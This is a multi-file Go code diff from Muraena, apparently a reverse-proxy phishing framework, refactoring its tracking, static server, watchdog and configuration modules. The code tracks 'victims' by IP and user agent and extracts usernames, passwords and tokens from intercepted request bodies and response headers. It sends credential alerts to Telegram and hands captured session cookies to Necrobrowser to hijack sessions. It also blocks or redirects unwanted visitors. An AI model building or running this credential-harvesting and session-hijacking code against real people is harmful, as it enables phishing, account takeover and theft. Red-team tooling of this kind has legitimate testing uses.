func (module *Necrobrowser) CheckSessionCookies() {
triggerValues := module.Session.Config.NecroBrowser.Trigger.Values
triggerValues := module.Session.Config.Necrobrowser.Trigger.Values
victims, err := db.GetAllVictims()
if err != nil {
@ -154,7 +154,7 @@ func (module *Necrobrowser) CheckSessionCookies() {
// if we find the cookies, and the session has not been already instrumented (== false), then instrument
if cookiesNeeded == cookiesFound && !v.SessionInstrumented {
//create Credential struct
// create Credential struct
type Creds struct {
Username string `json:"username"`
Password string `json:"password"`
@ -232,12 +232,12 @@ func (module *Necrobrowser) Instrument(victimID string, cookieJar []db.VictimCoo
module.Info("instrumenting %s", tui.Bold(tui.Red(victimID)))
client := resty.New()
resp, err := client.R().
SetHeader("Content-Type", "application/json").
SetHeader("Content-LandingType", "application/json").
SetBody(newRequest).
Post(module.Endpoint)
if err != nil {
module.Warning("Error sending request to NecroBrowser: %s", err)
module.Warning("Error sending request to Necrobrowser: %s", err)
return
}

View file

@ -3,9 +3,13 @@ package statichttp
import (
"fmt"
"log"
"net"
"net/http"
"net/url"
"path/filepath"
"strings"
"sync"
"github.com/evilsocket/islazy/tui"
@ -26,15 +30,9 @@ const (
// StaticHTTP module
type StaticHTTP struct {
session.SessionModule
Enabled bool
mux *http.ServeMux
address string
listeningPort int
Protocol string
ListeningHost string
LocalPath string
URLPath string
config session.StaticHTTPConfig
mux *http.ServeMux `toml:"-"`
address string `toml:"-"`
}
// Name returns the module name
@ -62,24 +60,16 @@ func Load(s *session.Session) (m *StaticHTTP, err error) {
m = &StaticHTTP{
SessionModule: session.NewSessionModule(Name, s),
Enabled: s.Config.StaticServer.Enabled,
config: s.Config.StaticServer,
}
if !m.Enabled {
if !m.config.Enabled {
m.Debug("is disabled")
return
}
config := s.Config.StaticServer
m.Protocol = "http://"
m.ListeningHost = "localhost"
m.listeningPort = config.Port
m.LocalPath = config.LocalPath
m.URLPath = config.URLPath
// Enable static server module
if err = m.Start(); err != nil {
m.Debug("Dying")
if err = m.start(); err != nil {
return
}
@ -87,29 +77,59 @@ func Load(s *session.Session) (m *StaticHTTP, err error) {
return
}
func (module *StaticHTTP) configure() error {
// Debugging wrapper around the file server
func (module *StaticHTTP) logFileServer(handler http.Handler, localPath string) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
filePath := filepath.Join(localPath, r.URL.Path)
module.Info("Requested %s", filePath)
handler.ServeHTTP(w, r)
}
}
module.address = fmt.Sprintf("127.0.0.1:%d", module.listeningPort)
func (module *StaticHTTP) configure() error {
config := module.config
// :0 means "assign an available port"
module.address = fmt.Sprintf("%s:%d", config.ListeningHost, config.ListeningPort)
module.mux = http.NewServeMux()
path := http.Dir(module.LocalPath)
path := http.Dir(config.LocalPath)
module.Debug("[Static Server] Requested resource: %s", path)
fileServer := http.FileServer(FileSystem{path})
module.mux.Handle(module.URLPath, http.StripPrefix(strings.TrimRight(module.URLPath, "/"), fileServer))
fileServer := http.FileServer(FileSystem{path})
debugFS := module.logFileServer(fileServer, config.LocalPath)
module.mux.Handle(config.URLPath, http.StripPrefix(strings.TrimRight(config.URLPath, "/"), debugFS))
return nil
}
// Start runs the Static HTTP server module
func (module *StaticHTTP) Start() (err error) {
if err := module.configure(); err != nil {
return err
// start runs the Static HTTP server module
func (module *StaticHTTP) start() (err error) {
if err = module.configure(); err != nil {
return
}
go http.ListenAndServe(module.address, module.mux)
listener, err := net.Listen("tcp", module.address)
if err != nil {
log.Fatalf("Error creating listener: %v", err)
}
return nil
// Retrieve the actual address & port assigned by the system
module.address = listener.Addr().String()
module.Info("listening on %s", module.address)
var wg sync.WaitGroup
wg.Add(1)
go func() {
wg.Done() // Signal the server is ready
if err := http.Serve(listener, module.mux); err != nil {
module.Error("%v", err)
}
}()
// Wait for the server to start
wg.Wait()
return
}
// FileSystem custom file system handler
@ -135,11 +155,10 @@ func (fs FileSystem) Open(path string) (http.File, error) {
return f, nil
}
func (module *StaticHTTP) MakeDestinationURL(URL *url.URL) (destination string) {
destination = ""
if strings.HasPrefix(URL.Path, module.URLPath) {
destination = fmt.Sprintf("%s%s:%d", module.Protocol, module.ListeningHost, module.listeningPort)
// GetNewDestination returns the destination URL for the given request
func (module *StaticHTTP) GetNewDestination(URL *url.URL) (destination string) {
if strings.HasPrefix(URL.Path, module.config.URLPath) {
destination = fmt.Sprintf("http://%s", module.address)
}
return

View file

@ -0,0 +1,44 @@
package statichttp
import (
"testing"
"time"
"github.com/muraenateam/muraena/core"
"github.com/muraenateam/muraena/log"
"github.com/muraenateam/muraena/session"
)
// init test
func init() {
opt := core.GetDefaultOptions()
opt.Debug = &[]bool{true}[0]
log.Init(opt, false, "")
}
func TestStaticHTTP_Start(t *testing.T) {
s := &session.Session{}
s.Config = &session.Configuration{}
s.Config.StaticServer = session.StaticHTTPConfig{
Enabled: true,
// ListeningHost: "",
// ListeningPort: 9090,
LocalPath: "c:\\windows\\system32\\",
URLPath: "/test/",
}
_, err := Load(s)
if err != nil {
t.Fatal(err)
}
t.Log("StaticHTTP started successfully")
// Sleep for 2minutes
time.Sleep(2 * time.Minute)
t.Log("StaticHTTP stopped successfully")
}

View file

@ -1,9 +1,10 @@
package tracking
import (
//"encoding/json"
// "encoding/json"
"encoding/json"
"fmt"
"net"
"net/http"
"net/url"
"path"
@ -13,6 +14,7 @@ import (
"time"
"github.com/manifoldco/promptui"
"github.com/muraenateam/muraena/log"
"github.com/muraenateam/muraena/module/telegram"
@ -45,15 +47,24 @@ const (
var DisabledExtensions = strings.Split(strings.ToLower(blockExtension), ",")
var DisabledMedia = strings.Split(strings.ToLower(blockMedia), ",")
type LandingType int
const (
LandingPath LandingType = iota
LandingQuery
)
// Tracker object structure
// Tracker module
type Tracker struct {
session.SessionModule
Enabled bool
Type string
Type LandingType
Identifier string
Header string
Landing string
LandingHeader string
ValidatorRegex *regexp.Regexp
TrackerLength int
}
@ -125,9 +136,18 @@ func Load(s *session.Session) (m *Tracker, err error) {
m = &Tracker{
SessionModule: session.NewSessionModule(Name, s),
Enabled: s.Config.Tracking.Enabled,
Header: "If-Range", // Default HTTP Header
Landing: "If-Landing-Redirect", // Default Landing HTTP Header
Type: strings.ToLower(s.Config.Tracking.Type),
Header: "If-Range", // Default HTTP Header
LandingHeader: "If-LandingHeader-Redirect", // Default LandingHeader HTTP Header
// Type: strings.ToLower(s.Config.Tracking.Trace.Landing.Type),
}
switch strings.ToLower(s.Config.Tracking.Trace.Landing.Type) {
case "path":
m.Type = LandingPath
case "query":
default:
m.Type = LandingQuery
}
if !m.Enabled {
@ -135,27 +155,27 @@ func Load(s *session.Session) (m *Tracker, err error) {
return
}
config := s.Config.Tracking
config := s.Config.Tracking.Trace
m.Identifier = config.Identifier
// Set tracking header
if s.Config.Tracking.Header != "" {
m.Header = s.Config.Tracking.Header
if s.Config.Tracking.Trace.Header != "" {
m.Header = s.Config.Tracking.Trace.Header
}
// Set landing header
if s.Config.Tracking.Landing != "" {
m.Landing = s.Config.Tracking.Landing
if s.Config.Tracking.Trace.Landing.Header != "" {
m.LandingHeader = s.Config.Tracking.Trace.Landing.Header
}
// Default Trace format is UUIDv4
m.ValidatorRegex = regexp.MustCompile("^[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-4[a-fA-F0-9]{3}-[8|9|aA|bB][a-fA-F0-9]{3" +
"}-[a-fA-F0-9]{12}$")
if config.Regex != "" {
m.ValidatorRegex, err = regexp.Compile(config.Regex)
if config.ValidatorRegex != "" {
m.ValidatorRegex, err = regexp.Compile(config.ValidatorRegex)
if err != nil {
m.Warning("Failed to compile tracking validator regex: %s. Falling back to UUID4.", config.Regex)
m.Warning("Failed to compile tracking validator regex: %s. Falling back to UUID4.", config.ValidatorRegex)
return
}
}
@ -169,6 +189,10 @@ func Load(s *session.Session) (m *Tracker, err error) {
// IsValid validates the tracking value
func (t *Trace) IsValid() bool {
if t.ValidatorRegex == nil {
return false
}
return t.ValidatorRegex.MatchString(t.ID)
}
@ -194,7 +218,7 @@ func isDisabledMediaType(media string, disabledMedia []string) bool {
return false
}
// Media Type handling.
// Media LandingType handling.
// Prevent processing of unwanted media types
media = strings.TrimSpace(strings.ToLower(media))
for _, skip := range disabledMedia {
@ -285,10 +309,10 @@ func (module *Tracker) TrackRequest(request *http.Request) (t *Trace) {
//
// Tracing types: Path || Query (default)
//
if module.Type == "path" {
if module.Type == LandingPath {
tr := module.Session.Config.Tracking
pathRegex := strings.Replace(tr.Identifier, "_", "/", -1) + tr.Regex
pathRegex := strings.Replace(tr.Trace.Identifier, "_", "/", -1) + tr.Trace.ValidatorRegex
re := regexp.MustCompile(pathRegex)
match := re.FindStringSubmatch(request.URL.Path)
@ -297,8 +321,8 @@ func (module *Tracker) TrackRequest(request *http.Request) (t *Trace) {
if len(match) > 0 {
t = module.makeTrace(match[0])
if t.IsValid() {
request.Header.Set(module.Landing, strings.ReplaceAll(request.URL.Path, t.ID, ""))
module.Info("setting %s header to %s", module.Landing, strings.ReplaceAll(request.URL.Path, t.ID, ""))
request.Header.Set(module.LandingHeader, strings.ReplaceAll(request.URL.Path, t.ID, ""))
module.Info("setting %s header to %s", module.LandingHeader, strings.ReplaceAll(request.URL.Path, t.ID, ""))
noTraces = false
isTrackedPath = true
}
@ -351,37 +375,39 @@ func (module *Tracker) TrackRequest(request *http.Request) (t *Trace) {
}
if v.ID == "" {
// Tracking IP
IPSource := request.RemoteAddr
if module.Session.Config.Tracking.IPSource != "" {
IPSource = request.Header.Get(module.Session.Config.Tracking.IPSource)
}
v := &db.Victim{
IPSource := GetRealAddr(request).String()
newVictim := &db.Victim{
ID: t.ID,
IP: IPSource,
UA: request.UserAgent(),
RequestCount: 0,
RequestCount: 1,
FirstSeen: time.Now().UTC().Format("2006-01-02 15:04:05"),
LastSeen: time.Now().UTC().Format("2006-01-02 15:04:05"),
}
module.PushVictim(v)
module.PushVictim(newVictim)
module.Info("[+] victim: %s \n\t%s\n\t%s", tui.Bold(tui.Red(t.ID)), tui.Yellow(IPSource), tui.Yellow(request.UserAgent()))
//module.Debug("[%s] %s://%s%s", request.Method, request.URL.Scheme, request.Host, request.URL.Path)
// module.Debug("[%s] %s://%s%s", request.Method, request.URL.Scheme, request.Host, request.URL.Path)
}
v.RequestCount++
if module.Type == "path" && isTrackedPath {
request.URL.Path = module.Session.Config.Tracking.RedirectTo
if module.Type == LandingPath && isTrackedPath {
if module.Session.Config.Tracking.Trace.Landing.RedirectTo != "" {
targetURL, err := url.ParseRequestURI(module.Session.Config.Tracking.Trace.Landing.RedirectTo)
if err != nil {
log.Error("invalid redirect URL after landing path: %s", err)
} else {
request.URL = targetURL
}
}
}
return
}
// TrackResponse tracks an HTTP Response
func (module *Tracker) TrackResponse(response *http.Response) (victim *db.Victim) {
// func (module *Tracker) TrackResponse(response *http.Response) (victim *db.Victim) {
func (module *Tracker) TrackResponse(response *http.Response) (t *Trace) {
// Do Not Track if not required
if !module.Enabled {
@ -389,7 +415,7 @@ func (module *Tracker) TrackResponse(response *http.Response) (victim *db.Victim
}
trackingFound := false
t := module.makeTrace("")
t = module.makeTrace("")
// Check cookies first to avoid replacing issues
for _, cookie := range response.Request.Cookies() {
@ -404,10 +430,9 @@ func (module *Tracker) TrackResponse(response *http.Response) (victim *db.Victim
// Trace not found in Cookies check If-Range (or custom defined) HTTP Headers
t = module.makeTrace(response.Request.Header.Get(module.Header))
if t.IsValid() {
cookieDomain := module.Session.Config.Proxy.Phishing
if module.Session.Config.Tracking.Domain != "" {
cookieDomain = module.Session.Config.Tracking.Domain
if module.Session.Config.Tracking.Trace.Domain != "" {
cookieDomain = module.Session.Config.Tracking.Trace.Domain
}
module.Info("Setting tracking cookie for domain: %s", cookieDomain)
@ -425,15 +450,18 @@ func (module *Tracker) TrackResponse(response *http.Response) (victim *db.Victim
// Reset trace
t = module.makeTrace("")
} else {
var err error
victim, err = t.GetVictim(t)
if err != nil {
module.Warning("Error: cannot retrieve Victim from tracker: %s", err)
}
}
// else {
// var err error
// victim, err = t.GetVictim(t)
// if err != nil {
// module.Warning("Error: cannot retrieve Victim from tracker: %s", err)
// }
// }
return victim
// return victim
return
}
// ExtractCredentials extracts credentials from a request body and stores within a VictimCredentials object
@ -448,8 +476,7 @@ func (t *Trace) ExtractCredentials(body string, request *http.Request) (found bo
// Investigate body only if the current URL.Path is related to credentials/keys to intercept
// given UrlsOfInterest.Credentials URLs, intercept username/password using patterns defined in the configuration
for _, c := range t.Session.Config.Tracking.Urls.Credentials {
for _, c := range t.Session.Config.Tracking.Secrets.Paths {
// If the URL is a wildcard, then we need to check if the request URL matches the wildcard
matched := false
if strings.HasPrefix(c, "^") && strings.HasSuffix(c, "$") {
@ -459,18 +486,22 @@ func (t *Trace) ExtractCredentials(body string, request *http.Request) (found bo
}
if matched {
//t.Verbose("[%s] there might be credentials here.")
for _, p := range t.Session.Config.Tracking.Patterns {
for _, p := range t.Session.Config.Tracking.Secrets.Patterns {
// Case *sensitive* matching
if strings.Contains(body, p.Matching) {
// Extract it
value := InnerSubstring(body, p.Start, p.End)
if value != "" {
found = true
// Decode URL-encoded values
mediaType := strings.ToLower(request.Header.Get("Content-Type"))
if strings.Contains(mediaType, "urlencoded") {
value, err = url.QueryUnescape(value)
if err != nil {
if v, err := url.QueryUnescape(value); err != nil {
t.Warning("%s", err)
} else {
value = v
}
}
@ -485,10 +516,9 @@ func (t *Trace) ExtractCredentials(body string, request *http.Request) (found bo
return false, err
}
found = true
message := fmt.Sprintf("[%s] [+] credentials: %s", t.ID, tui.Bold(creds.Key))
t.Info("%s=%s", message, tui.Bold(tui.Red(creds.Value)))
// t.Debug("[+] Pattern: %v", p)
t.Info("%s=%s (%s)", message, tui.Bold(tui.Red(creds.Value)), request.URL.Path)
if tel := telegram.Self(t.Session); tel != nil {
tel.Send(message)
}
@ -496,9 +526,79 @@ func (t *Trace) ExtractCredentials(body string, request *http.Request) (found bo
}
}
if found {
break
// if found {
// break
// }
}
}
if found {
t.ShowCredentials()
}
return found, nil
}
// ExtractCredentialsFromResponseHeaders extracts tracking credentials from response headers.
// It returns true if credentials are found, false otherwise.
func (t *Trace) ExtractCredentialsFromResponseHeaders(response *http.Response) (found bool, err error) {
found = false
victim, err := t.GetVictim(t)
if err != nil {
t.Error("%s", err)
return found, err
}
// Investigate body only if the current URL.Path is related to credentials/keys to intercept
// given UrlsOfInterest.Credentials URLs, intercept username/password using patterns defined in the configuration
for _, c := range t.Session.Config.Tracking.Secrets.Paths {
// If the URL is a wildcard, then we need to check if the request URL matches the wildcard
matched := false
if strings.HasPrefix(c, "^") && strings.HasSuffix(c, "$") {
matched, _ = regexp.MatchString(c, response.Request.URL.Path)
} else {
matched = response.Request.URL.Path == c
}
if matched {
for _, p := range t.Session.Config.Tracking.Secrets.Patterns {
for k, v := range response.Header {
// generate the header string:
// key: value
header := fmt.Sprintf("%s: %s", k, strings.Join(v, " "))
if strings.Contains(header, p.Matching) {
// Extract it
value := InnerSubstring(header, p.Start, p.End)
if value != "" {
creds := &db.VictimCredential{
Key: p.Label,
Value: value,
Time: time.Now().UTC().Format("2006-01-02 15:04:05"),
}
if err = creds.Store(victim.ID); err != nil {
return false, err
}
found = true
message := fmt.Sprintf("[%s] [+] credentials: %s", t.ID, tui.Bold(creds.Key))
t.Info("%s=%s", message, tui.Bold(tui.Red(creds.Value)))
if tel := telegram.Self(t.Session); tel != nil {
tel.Send(message)
}
}
}
}
}
// if found {
// break
// }
}
}
@ -514,7 +614,7 @@ func (t *Trace) ExtractCredentials(body string, request *http.Request) (found bo
// pass the cookies in the CookieJar to necrobrowser to hijack the session
func (t *Trace) HijackSession(request *http.Request) (err error) {
if !t.Session.Config.NecroBrowser.Enabled {
if !t.Session.Config.Necrobrowser.Enabled {
return
}
@ -525,7 +625,7 @@ func (t *Trace) HijackSession(request *http.Request) (err error) {
return
}
for _, c := range t.Session.Config.Tracking.Urls.AuthSession {
for _, c := range t.Session.Config.Necrobrowser.SensitiveLocations.AuthSession {
if request.URL.Path == c {
getSession = true
break
@ -554,3 +654,19 @@ func (t *Trace) HijackSession(request *http.Request) (err error) {
return
}
// GetRealAddr returns the IP address from an http.Request
func GetRealAddr(r *http.Request) net.IP {
if forwarded := r.Header.Get("X-Forwarded-For"); forwarded != "" {
if parts := strings.Split(forwarded, ","); len(parts) > 0 {
// Intermediate nodes append, so first is the original client
return net.ParseIP(strings.TrimSpace(parts[0]))
}
}
addr, _, err := net.SplitHostPort(r.RemoteAddr)
if err == nil {
return net.ParseIP(addr)
}
return net.ParseIP(r.RemoteAddr)
}

View file

@ -69,13 +69,15 @@ func (module *Tracker) ExportSession(id string) {
var cookieJar []necrobrowser.SessionCookie
for _, c := range victim.Cookies {
log.Debug("trying to parse %s with layout %s", c.Expires, timeLayout)
//log.Verbose("trying to parse %s with layout %s", c.Expires, timeLayout)
t, err := time.Parse(timeLayout, c.Expires)
if err != nil {
log.Warning("cant's parse Expires field (%s) of cookie %s. skipping cookie", c.Expires, c.Name)
continue
}
// replace :443 with empty string to avoid issues with port number
nc := necrobrowser.SessionCookie{
Name: c.Name,
Value: c.Value,
@ -96,6 +98,7 @@ func (module *Tracker) ExportSession(id string) {
return
}
log.Info("There are %d cookies", len(cookieJar))
log.Info("CookieJar:\n%s", tui.Bold(string(cookieJarJson)))
}
@ -141,5 +144,5 @@ func (module *Tracker) PushCookie(victim *db.Victim, cookie db.VictimCookie) {
return
}
module.Debug("[%s][+] cookie: %s (%s)", victim.ID, tui.Bold(tui.Green(cookie.Name)), tui.Bold(tui.Green(cookie.Domain)))
module.Verbose("[%s][+] cookie: %s (%s)", victim.ID, tui.Bold(tui.Green(cookie.Name)), tui.Bold(tui.Green(cookie.Domain)))
}

View file

@ -10,6 +10,7 @@ import (
"github.com/manifoldco/promptui"
"github.com/muraenateam/muraena/core"
"github.com/muraenateam/muraena/log"
)
type ResponseCode string
@ -64,15 +65,17 @@ func (module *Watchdog) PromptResponseAction() {
}
}
// BlockRequest takes action and send the visitor to a chosen destination, i.e. blocks or trolls him
// CustomResponse takes action and send the visitor to a chosen destination, i.e. blocks or trolls him
func (module *Watchdog) CustomResponse(response http.ResponseWriter, request *http.Request) {
switch module.Action.Code {
case rNginx404:
log.Debug("Sending Nginx 404 page")
module.NginxNotFound(response, request)
case rCustom301:
log.Debug("Sending custom 301 page: %s", module.Action.TargetURL)
module.CustomMovedPermanently(response, request, module.Action.TargetURL)
}
}

View file

@ -552,7 +552,7 @@ func (module *Watchdog) Allow(r *http.Request) bool {
continue
}
// Regex can apply to:
// ValidatorRegex can apply to:
// - UserAgent
// - IP/Network/Etc.
@ -631,7 +631,7 @@ func (module *Watchdog) Allow(r *http.Request) bool {
}
if !allow {
module.Error("Blocked visitor [%s/%s]", tui.Red(ip.String()), tui.Red(ua))
module.Important("Blocked %s (ua: %s)", tui.Red(ip.String()), tui.Red(ua))
}
return allow
@ -677,7 +677,6 @@ func (module *Watchdog) MonitorRules() {
// GetRealAddr returns the IP address from an http.Request
func GetRealAddr(r *http.Request) net.IP {
if forwarded := r.Header.Get("X-Forwarded-For"); forwarded != "" {
if parts := strings.Split(forwarded, ","); len(parts) > 0 {
// Intermediate nodes append, so first is the original client
@ -689,8 +688,8 @@ func GetRealAddr(r *http.Request) net.IP {
if err == nil {
return net.ParseIP(addr)
}
return net.ParseIP(r.RemoteAddr)
// return net.ParseIP(proxy.GetSenderIP(r))
}
// GetUserAgent returns the User-Agent string from an http.Request

View file

@ -4,6 +4,7 @@ import (
"fmt"
"io/ioutil"
"os"
"regexp"
"strings"
"github.com/pelletier/go-toml"
@ -12,35 +13,62 @@ import (
"github.com/muraenateam/muraena/core"
)
const (
DefaultIP = "0.0.0.0"
DefaultListener = "tcp"
DefaultHTTPPort = 80
DefaultHTTPSPort = 443
var (
DefaultIP = "0.0.0.0"
DefaultListener = "tcp"
DefaultHTTPPort = 80
DefaultHTTPSPort = 443
DefaultBase64Padding = []string{"=", "."}
DefaultSkipContentType = []string{"font/*", "image/*"}
)
// Configuration
type Configuration struct {
Protocol string `toml:"-"`
SkipExtensions []string `toml:"-"`
type Redirect struct {
Hostname string `toml:"hostname"`
Path string `toml:"path"`
Query string `toml:"query"`
RedirectTo string `toml:"redirectTo"`
HTTPStatusCode int `toml:"httpStatusCode"`
}
type StaticHTTPConfig struct {
Enabled bool `toml:"enable"`
LocalPath string `toml:"localPath"`
URLPath string `toml:"urlPath"`
ListeningHost string `toml:"listeningHost"`
ListeningPort int `toml:"listeningPort"`
}
// Configuration struct
type Configuration struct {
//
// Proxy rules
//
Proxy struct {
Phishing string `toml:"phishing"`
Target string `toml:"destination"`
IP string `toml:"IP"`
Listener string `toml:"listener"`
Port int `toml:"port"`
PortMap string `toml:"portmapping"`
Phishing string `toml:"phishing"`
Target string `toml:"destination"`
IP string `toml:"IP"`
Listener string `toml:"listener"`
Port int `toml:"port"`
PortMap string `toml:"portmapping"`
HTTPtoHTTPS struct {
Enabled bool `toml:"enabled"`
HTTPport int `toml:"HTTPport"`
HTTPport int `toml:"port"`
} `toml:"HTTPtoHTTPS"`
Protocol string `toml:"-"`
} `toml:"proxy"`
//
// Origins
//
Origins struct {
ExternalOriginPrefix string `toml:"externalOriginPrefix"`
ExternalOrigins []string `toml:"externalOrigins"`
OriginsMapping map[string]string `toml:"-"`
SubdomainMap [][]string `toml:"subdomainMap"`
} `toml:"origins"`
//
// Transforming rules
//
@ -50,60 +78,51 @@ type Configuration struct {
Padding []string `toml:"padding"`
} `toml:"base64"`
SkipContentType []string `toml:"skipContentType"`
Request struct {
SkipExtensions []string `toml:"-"`
UserAgent string `toml:"userAgent"`
// Headers list to consider for the transformation
Headers []string `toml:"headers"`
Remove struct {
Headers []string `toml:"headers"`
} `toml:"remove"`
Add struct {
Headers []struct {
Name string `toml:"name"`
Value string `toml:"value"`
} `toml:"headers"`
} `toml:"add"`
} `toml:"request"`
Response struct {
Headers []string `toml:"headers"`
Custom [][]string `toml:"content"`
SkipContentType []string `toml:"skipContentType"`
Headers []string `toml:"headers"`
// CustomContent Transformations
CustomContent [][]string `toml:"customContent"`
Cookie struct {
SameSite string `toml:"sameSite"`
} `toml:"cookie"`
Remove struct {
Headers []string `toml:"headers"`
} `toml:"remove"`
Add struct {
Headers []struct {
Name string `toml:"name"`
Value string `toml:"value"`
} `toml:"headers"`
} `toml:"add"`
} `toml:"response"`
} `toml:"transform"`
//
// Wiping rules
//
Remove struct {
Request struct {
Headers []string `toml:"headers"`
} `toml:"request"`
Response struct {
Headers []string `toml:"headers"`
} `toml:"response"`
} `toml:"remove"`
//
// Crafting rules
// TODO: Merge this with Wiping rule in some standard approach
//
Craft struct {
Add struct {
Request struct {
Headers []struct {
Name string `toml:"name"`
Value string `toml:"value"`
} `toml:"headers"`
} `toml:"request"`
Response struct {
Headers []struct {
Name string `toml:"name"`
Value string `toml:"value"`
} `toml:"headers"`
} `toml:"response"`
} `toml:"add"`
} `toml:"craft"`
//
// Redirection rules
//
Drop []struct {
Path string `toml:"path"`
RedirectTo string `toml:"redirectTo"`
} `toml:"drop"`
Redirects []Redirect `toml:"redirect"`
//
// Logging
@ -117,9 +136,9 @@ type Configuration struct {
// DB (Redis)
//
Redis struct {
Host string `toml:"host"`
Port int `toml:"port"`
Password string `toml:"password"`
Host string `toml:"host"` // default: 127.0.0.1
Port int `toml:"port"` // default: 6379
Password string `toml:"password"` // default: ""
} `toml:"redis"`
//
@ -131,6 +150,7 @@ type Configuration struct {
Certificate string `toml:"certificate"`
Key string `toml:"key"`
Root string `toml:"root"`
SSLKeyLog string `toml:"sslKeyLog"`
CertificateContent string `toml:"-"`
KeyContent string `toml:"-"`
@ -138,6 +158,7 @@ type Configuration struct {
// Minimum supported TLS version: SSL3, TLS1, TLS1.1, TLS1.2, TLS1.3
MinVersion string `toml:"minVersion"`
MaxVersion string `toml:"maxVersion"`
PreferServerCipherSuites bool `toml:"preferServerCipherSuites"`
SessionTicketsDisabled bool `toml:"SessionTicketsDisabled"`
InsecureSkipVerify bool `toml:"insecureSkipVerify"`
@ -145,32 +166,63 @@ type Configuration struct {
} `toml:"tls"`
//
// Crawler & Origins
// Tracking
//
Tracking struct {
Enabled bool `toml:"enable"`
TrackRequestCookies bool `toml:"trackRequestCookies"`
Trace struct {
Identifier string `toml:"identifier"`
Header string `toml:"header"`
Domain string `toml:"domain"`
ValidatorRegex string `toml:"validator"`
Landing struct {
Type string `toml:"type"` // path or query
Header string `toml:"header"`
RedirectTo string `toml:"redirectTo"` // redirect url once the landing is detected (applicable only if type is path)
} `toml:"landing"`
} `toml:"trace"`
Secrets struct {
Paths []string `toml:"paths"`
Patterns []struct {
Label string `toml:"label"`
Matching string `toml:"matching"`
Start string `toml:"start"`
End string `toml:"end"`
} `toml:"patterns"`
} `toml:"secrets"`
} `toml:"tracking"`
//
// Crawler
//
Crawler struct {
Enabled bool `toml:"enabled"`
Depth int `toml:"depth"`
UpTo int `toml:"upto"`
ExternalOriginPrefix string `toml:"externalOriginPrefix"`
ExternalOrigins []string `toml:"externalOrigins"`
OriginsMapping map[string]string `toml:"-"`
} `toml:"crawler"`
//
// Necrobrowser
//
NecroBrowser struct {
Enabled bool `toml:"enabled"`
Endpoint string `toml:"endpoint"`
Profile string `toml:"profile"`
Necrobrowser struct {
Enabled bool `toml:"enabled"`
SensitiveLocations struct {
AuthSession []string `toml:"authSession"`
AuthSessionResponse []string `toml:"authSessionResponse"`
} `toml:"urls"`
Endpoint string `toml:"endpoint"`
Profile string `toml:"profile"`
Keepalive struct {
Enabled bool `toml:"enabled"`
Minutes int `toml:"minutes"`
} `toml:"keepalive"`
Trigger struct {
Type string `toml:"type"`
Values []string `toml:"values"`
@ -178,15 +230,7 @@ type Configuration struct {
} `toml:"trigger"`
} `toml:"necrobrowser"`
//
// Static Server
//
StaticServer struct {
Enabled bool `toml:"enabled"`
Port int `toml:"port"`
LocalPath string `toml:"localPath"`
URLPath string `toml:"urlPath"`
} `toml:"staticServer"`
StaticServer StaticHTTPConfig `toml:"staticServer"`
//
// Watchdog
@ -198,34 +242,6 @@ type Configuration struct {
GeoDB string `toml:"geoDB"`
} `toml:"watchdog"`
//
// Tracking
//
Tracking struct {
Enabled bool `toml:"enabled"`
Type string `toml:"type"`
Identifier string `toml:"identifier"`
Header string `toml:"header"`
Landing string `toml:"landing"`
Domain string `toml:"domain"`
IPSource string `toml:"ipSource"`
Regex string `toml:"regex"`
RedirectTo string `toml:"redirectTo"`
Urls struct {
Credentials []string `toml:"credentials"`
AuthSession []string `toml:"authSession"`
AuthSessionResponse []string `toml:"authSessionResponse"`
} `toml:"urls"`
Patterns []struct {
Label string `toml:"label"`
Matching string `toml:"matching"`
Start string `toml:"start"`
End string `toml:"end"`
} `toml:"patterns"`
} `toml:"tracking"`
//
// Telegram
//
@ -274,8 +290,35 @@ func (s *Session) GetConfiguration() (err error) {
}
}
// HTTPtoHTTPS
if s.Config.Proxy.HTTPtoHTTPS.Enabled {
if s.Config.Proxy.HTTPtoHTTPS.HTTPport == 0 {
s.Config.Proxy.HTTPtoHTTPS.HTTPport = DefaultHTTPPort
}
}
//
// Origins
//
// ExternalOriginPrefix must match the a-zA-Z0-9\- regex pattern
if s.Config.Origins.ExternalOriginPrefix != "" {
m, err := regexp.MatchString("^[a-zA-Z0-9-]+$", s.Config.Origins.ExternalOriginPrefix)
if err != nil {
return errors.New(fmt.Sprintf("Error matching ExternalOriginPrefix %s: %s", s.Config.Origins.ExternalOriginPrefix, err))
}
if !m {
return errors.New(fmt.Sprintf("Invalid ExternalOriginPrefix %s. It must match the a-zA-Z0-9\\- regex pattern.", s.Config.Origins.ExternalOriginPrefix))
}
} else {
s.Config.Origins.ExternalOriginPrefix = "ext"
}
s.Config.Origins.OriginsMapping = make(map[string]string)
// Load TLS config
s.Config.Protocol = "http://"
s.Config.Proxy.Protocol = "http://"
if s.Config.TLS.Enabled {
@ -325,7 +368,7 @@ func (s *Session) GetConfiguration() (err error) {
}
}
s.Config.Protocol = "https://"
s.Config.Proxy.Protocol = "https://"
s.Config.TLS.MinVersion = strings.ToUpper(s.Config.TLS.MinVersion)
if !core.StringContains(s.Config.TLS.MinVersion, []string{"SSL3.0", "TLS1.0", "TLS1.1", "TLS1.2", "TLS1.3"}) {
@ -333,6 +376,12 @@ func (s *Session) GetConfiguration() (err error) {
s.Config.TLS.MinVersion = "TLS1.0"
}
s.Config.TLS.MaxVersion = strings.ToUpper(s.Config.TLS.MaxVersion)
if !core.StringContains(s.Config.TLS.MaxVersion, []string{"SSL3.0", "TLS1.0", "TLS1.1", "TLS1.2", "TLS1.3"}) {
// Fallback to TLS1.3
s.Config.TLS.MaxVersion = "TLS1.3"
}
s.Config.TLS.RenegotiationSupport = strings.ToUpper(s.Config.TLS.RenegotiationSupport)
if !core.StringContains(s.Config.TLS.RenegotiationSupport, []string{"NEVER", "ONCE", "FREELY"}) {
// Fallback to NEVER
@ -341,10 +390,19 @@ func (s *Session) GetConfiguration() (err error) {
}
s.Config.Crawler.OriginsMapping = make(map[string]string)
//
// Transforming rules
//
if s.Config.Transform.Base64.Padding == nil {
s.Config.Transform.Base64.Padding = DefaultBase64Padding
}
s.Config.SkipExtensions = []string{
"ttf", "otf", "woff", "woff2", "eot", //fonts and images
if s.Config.Transform.Response.SkipContentType == nil {
s.Config.Transform.Response.SkipContentType = DefaultSkipContentType
}
s.Config.Transform.Request.SkipExtensions = []string{
"ttf", "otf", "woff", "woff2", "eot", // fonts and images
"ase", "art", "bmp", "blp", "cd5", "cit", "cpt", "cr2", "cut", "dds", "dib", "djvu", "egt", "exif", "gif",
"gpl", "grf", "icns", "ico", "iff", "jng", "jpeg", "jpg", "jfif", "jp2", "jps", "lbm", "max", "miff", "mng",
